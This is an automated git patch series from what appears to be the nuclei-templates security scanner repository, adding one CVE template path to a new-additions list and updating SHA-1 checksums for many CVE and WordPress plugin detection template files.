2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 19 Jun 2024 08:27:22 +0000 Subject: [PATCH 0406/1841] Auto Generated New Template Addition List [Wed Jun 19 08:27:22 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a28040eb41..9444781207 100644 --- a/.new-additions +++ b/.new-additions @@ -22,6 +22,7 @@ http/cves/2024/CVE-2024-24565.yaml http/cves/2024/CVE-2024-2621.yaml http/cves/2024/CVE-2024-27718.yaml http/cves/2024/CVE-2024-28995.yaml +http/cves/2024/CVE-2024-29824.yaml http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-31982.yaml http/cves/2024/CVE-2024-32113.yaml From feab31eaff06d05f099f693330a7f935fb7ac4d8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 08:27:28 +0000 Subject: [PATCH 0407/1841] Auto Generated Templates Checksum [Wed Jun 19 08:27:28 UTC 2024] :robot: --- templates-checksum.txt | 401 +++++++++++++++++++++-------------------- 1 file changed, 202 insertions(+), 199 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index db03b1a031..55f76e9a7a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3208,7 +3208,7 @@ http/cves/2023/CVE-2023-47246.yaml:6cbc4ea372ee4b2b9bd59c9d7a88933946d4eb45 http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 http/cves/2023/CVE-2023-48023.yaml:45c9fed1d64556214b74e1de1852e6a6995bacbe http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 -http/cves/2023/CVE-2023-48241.yaml:ef37b345681568fba006661e483b5a933d55aa1e +http/cves/2023/CVE-2023-48241.yaml:dfc0a5bb442e3fbd259af0a16c5ecedfeb56c758 http/cves/2023/CVE-2023-48777.yaml:52b0e3e7eb3ed22f9d0d68114053dd9ea87677d6 http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc @@ -3218,8 +3218,8 @@ http/cves/2023/CVE-2023-4974.yaml:903173457ec36bc7a21422fa82994faba8b2dbe1 http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 http/cves/2023/CVE-2023-5003.yaml:4f800fa6ab1df2267322e0b1527e8c7a09829769 http/cves/2023/CVE-2023-50290.yaml:33c022c45e47628e6c1f7865bd10b4dc28c4e37b -http/cves/2023/CVE-2023-50719.yaml:e573b0b557dca2c2b36c63d85092a4c8cc6f0f4f -http/cves/2023/CVE-2023-50720.yaml:9ee7acb29dea66096e2631377c6353f81d34e998 +http/cves/2023/CVE-2023-50719.yaml:8d2bc303865b4701fd54709785e88793cea3abd4 +http/cves/2023/CVE-2023-50720.yaml:b0f2e6b59eddfcd00aeb9135382a75c20b87fe72 http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba @@ -3298,7 +3298,9 @@ http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-23692.yaml:aed80d269b633036a75391e6e5524265d83714d8 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 +http/cves/2024/CVE-2024-24112.yaml:02f1d93189f81a45341e7a2c2bff5f935df70204 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c +http/cves/2024/CVE-2024-24565.yaml:d76d87331d853587d4dd5432f06bc4f755135c3c http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 @@ -3320,6 +3322,7 @@ http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 +http/cves/2024/CVE-2024-29824.yaml:96a8d8932091744ec703b3ce38b39145606f0b95 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae @@ -3341,7 +3344,7 @@ http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-34982.yaml:3973d5f657a029a5b9285865b8ca075de586fcbf +http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -7101,227 +7104,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dbfde9d91f781d959a21147d8b90cf27feb078d1 +http/technologies/wordpress/plugins/add-to-any.yaml:527342257321616af7f24a98e64e0737289431d9 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:385b7e18768e13eb02f30154d25589f9da5bf3c3 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:518e51ee781cdc6012be276e374da9595d407a3a +http/technologies/wordpress/plugins/akismet.yaml:1547bf6545b02ef629b9049df9c98a31431f3dea http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:37f3e7b2423a65ffe26fee852a39d8ad4553f8c7 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4323d8b96ffdb5a6e3ed7e9509d0bf330f663cd7 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:c76d27e825f6efa6e58082811032ac7b9bf6698c +http/technologies/wordpress/plugins/amp.yaml:811dae1c9ed6c9a09a9494e33e94977eac6aeb83 +http/technologies/wordpress/plugins/antispam-bee.yaml:c1b24f342dfd947720606c9fd6a87e613f09360d +http/technologies/wordpress/plugins/astra-sites.yaml:9fee9041cb567f98a0ec2fbe74e0388b10974ab3 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:691a8e250d32df738871d3783b8fb64bb30c051d -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/autoptimize.yaml:4b8036d5d2e984e2b2a7248d30967fa066d5eb49 +http/technologies/wordpress/plugins/backwpup.yaml:c0e73b6a661f6b9afcef82b5bb3f907122c95603 +http/technologies/wordpress/plugins/better-search-replace.yaml:a1bf224126a58de84c95cfbd95c32155c87e1b85 +http/technologies/wordpress/plugins/better-wp-security.yaml:99f687eeb71440a35d0ebd132dbfc9f71e17c9a9 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b6f93b17a8294a8c81f5419082fa81f97071ee65 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:e9c9b020a4a4628a509395ff59c5b6ecbae4ac5e +http/technologies/wordpress/plugins/breeze.yaml:e0fd122b2d34c8d6193ce62d238976d86565c7e0 +http/technologies/wordpress/plugins/broken-link-checker.yaml:6498974e2f525038b644befb8531a61352305daf +http/technologies/wordpress/plugins/child-theme-configurator.yaml:cfc0f7a38a32ed28445e2e85dfa3d574c5a378d4 +http/technologies/wordpress/plugins/classic-editor.yaml:acf8443e322f7e4b9610a2188cf63a158c6ff28a +http/technologies/wordpress/plugins/classic-widgets.yaml:2e2fb0e35a2a8ddad6b5a9aa99dd2760805a07b7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:a779b43a84c80e9a01fe81c654d9c4e9dc6e0c74 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/cmb2.yaml:9898ad29853a0621c7ec5c2f05b56416f119257f +http/technologies/wordpress/plugins/coblocks.yaml:6b82bfbd57d2430b21cb9829cc105df26ad9455d +http/technologies/wordpress/plugins/code-snippets.yaml:63d3cf65b1c8ca9db46ac3aa6ff69a31b82dfa39 +http/technologies/wordpress/plugins/coming-soon.yaml:6bfddff4b8b246f8dabb0d1f3924e010c7106e7d +http/technologies/wordpress/plugins/complianz-gdpr.yaml:86e211f50b91d96bbc6d501879077736ba2cdf96 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:3298ad224f9d81f4cd28abd0226fd4fc7771bc5c +http/technologies/wordpress/plugins/contact-form-7.yaml:34d246565c7759701d206f716c2a8540354dc0b9 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:1707e20b7caff80e933c13bbbeab28e21c3556a6 +http/technologies/wordpress/plugins/cookie-law-info.yaml:2975b37b1a306692fce049d8c50680d2db9366de +http/technologies/wordpress/plugins/cookie-notice.yaml:1206cb9ef094637b1d4d278ab08c052e472713f2 http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:a9e8c5e6a6aa2637394a3d0fa61822f97432fb78 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:3a617385a10102e4f735204337572d6fd09793ae +http/technologies/wordpress/plugins/custom-css-js.yaml:9cc5dca933f860d632658fd4016ede5b00f72a10 +http/technologies/wordpress/plugins/custom-fonts.yaml:7c5a87a2c10fe77bd5621b67b878ed27554c1f71 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:d4667323b592cd83f85fa89fd1ac5a7fec4ad70a +http/technologies/wordpress/plugins/disable-comments.yaml:ff3475bcdd7fccd8628ef45163410a5662b8d1e8 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:72555ec818ca31a76a7a0396d4b7e9198ae49c85 +http/technologies/wordpress/plugins/duplicate-page.yaml:f6ce3ca7c840bd585d9a8a40fba628a6570644db +http/technologies/wordpress/plugins/duplicate-post.yaml:fcc8937fbd5bfa09ae90f3ae2ce3362aaee50701 +http/technologies/wordpress/plugins/duplicator.yaml:db803a522ca486759a9ae6494c94af4b81dd27b1 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:e77279884ba7297fea1ea1229ccd23b213780dae http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:f018281d35783c83a8813a321e511b7210b67d77 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:cb24e296621dfed77f291889b5094083275976a7 +http/technologies/wordpress/plugins/elementor.yaml:bee17dc0b93e4c2ca6bb99287e1540dbc4eaf37c +http/technologies/wordpress/plugins/elementskit-lite.yaml:7441fb07cde879aaa7188faf63e435c70814e8d5 +http/technologies/wordpress/plugins/enable-media-replace.yaml:20083e13c9f7c951cb9891bf4a1e51cd907be580 +http/technologies/wordpress/plugins/envato-elements.yaml:6aa3ca52dbe91fc2f41d81d2cf9cfcb5da611e73 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:23ac79f6481d37ef4237cfbcd133dabd5d72d486 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:6830cbd573ef2f9466cd915b57df5616fc669bfe +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:58de032246ee3406ad7751aa66e58ae7da93e056 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:28c617a6bf97df048ad47d76fa95befceb194b80 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:7224b2e0fe2938a513fc3817b4dfe11fe67f4271 +http/technologies/wordpress/plugins/flamingo.yaml:60a35df481b422f586387d0709d995437a1f1021 +http/technologies/wordpress/plugins/fluentform.yaml:0fd2d537bb944052c4fe072212325a3025c2fe5c +http/technologies/wordpress/plugins/font-awesome.yaml:dd914bff4b8d290a8c31b01aa7c49843bc1deb5f +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6ea5253db920851a80993a2d6b5a6662d8dc6cad +http/technologies/wordpress/plugins/formidable.yaml:20e8ac7904d4ca37f21f432c86c1d11c41d98a14 +http/technologies/wordpress/plugins/forminator.yaml:e1a28cbf60a139e74126564cbc17658f78f10ba4 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:87e37413b84309152315d8651664b29484b5644c +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:9eeaddccc2f81fa5afee374485eb3a6f3d839ce9 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:db90f24f596326229a78742fe1d062fc6c7aa9c6 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:00288b4d695fc67b6d86dbdea722d71bd5cd37ee +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:5695889bc92d33493cb469b8e2b4b56fcf8e35ce +http/technologies/wordpress/plugins/google-site-kit.yaml:bfe23618694960ad31d83be8d884c485c59e52fc +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:a04e5b47dfdafeabf274374bf01bcc7dfaab44d3 +http/technologies/wordpress/plugins/gtranslate.yaml:a6a2095cf8d26a0b72685e049de59b8ff1902e0a +http/technologies/wordpress/plugins/gutenberg.yaml:93a3cf9f85400691e66263bf193bb7d1ce76c2be +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:bf2f2dc00a56080346f1240648cf0a759aa042ca http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:7e97c3677725419acd5f2ba21490b571a984ff7b +http/technologies/wordpress/plugins/header-footer-elementor.yaml:bcb1653e856e0008d153f12ccb5be35ba1e46cdb +http/technologies/wordpress/plugins/header-footer.yaml:312a9c848d65bb913369c4e6ae76b3755513a71f +http/technologies/wordpress/plugins/health-check.yaml:034a1b426afdf3717e444996eb52297bdd0ee0c2 +http/technologies/wordpress/plugins/hello-dolly.yaml:8568be3d2832b6247d1c9cda80f5fc62a676cead +http/technologies/wordpress/plugins/host-webfonts-local.yaml:754da1c47401f04dada1b78261832dcb31ee9853 +http/technologies/wordpress/plugins/hostinger.yaml:76df4c56454fb4232e7b736af2f9981068d5164e http/technologies/wordpress/plugins/image-optimization.yaml:fd00671fcb1a927454714d707e89e62b40f6a329 -http/technologies/wordpress/plugins/imagify.yaml:b82e202b7774603cc5dfc671f09e78399cd6a82b -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:e2398e4c0e2ea31019da3715d6aed35ccc0f6729 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:be5174a80ec6c119a05428acdc1218fac85a6795 -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/imagify.yaml:438875f7effa4423044bc24d5e06fb21ff51aab6 +http/technologies/wordpress/plugins/imsanity.yaml:846eef1e1f1dc42e70d8abe1b63921e0c6543253 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:4b873f476425017c1dbf05ac33ad171a8f903ecf +http/technologies/wordpress/plugins/instagram-feed.yaml:1e0845363380d7441a54743d7fc64f0a064939a7 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:900c94abb4d18248826f1805a3216c0a06cd9d59 +http/technologies/wordpress/plugins/iwp-client.yaml:33cb28de0ae59fe6eeb13e0e1994fecbad8abef4 +http/technologies/wordpress/plugins/jetpack-boost.yaml:ef32ea1942cf0f67f90a8d289414e11f294bd6bb +http/technologies/wordpress/plugins/jetpack.yaml:5a93dd77f6a73191b4bdb1aef867cf22a5a61898 +http/technologies/wordpress/plugins/kadence-blocks.yaml:f12cdccdf84e5fbca99142b81c2ba192fe280d6d +http/technologies/wordpress/plugins/kirki.yaml:62a9ede76f4bc32508ab3e12e345de28b7a10df6 +http/technologies/wordpress/plugins/leadin.yaml:3aad041be3333930bb4071ee63f8620ec5e2ba99 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:f84fa8ef10ddb7da1a3c3bf82422b73ed12bd1c7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:cd99fdefde9e4984115a9189abb53478ee276dcc +http/technologies/wordpress/plugins/litespeed-cache.yaml:e36a45d1e502b6cad2ec4ad9536c1e4bf5c9494e +http/technologies/wordpress/plugins/loco-translate.yaml:554679038778daf4ecf87d6e54e44a22a4dc2492 +http/technologies/wordpress/plugins/loginizer.yaml:c54370f05be0aa5ba5a8c076f1555ad185135891 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:80de34e84d55586e5eda37d00d277aad7f4b2451 -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/metform.yaml:aaa8b95a995e3345112a288f66e705b150968e7e -http/technologies/wordpress/plugins/ml-slider.yaml:104ad761a31985f8f0947e3e0b9bf872fe1f2c2a -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:f00d03dc0f365956376cec268c45bd669729260e -http/technologies/wordpress/plugins/ninja-forms.yaml:cc29026bcd3c62478d5147fd80a8b3a560bfe728 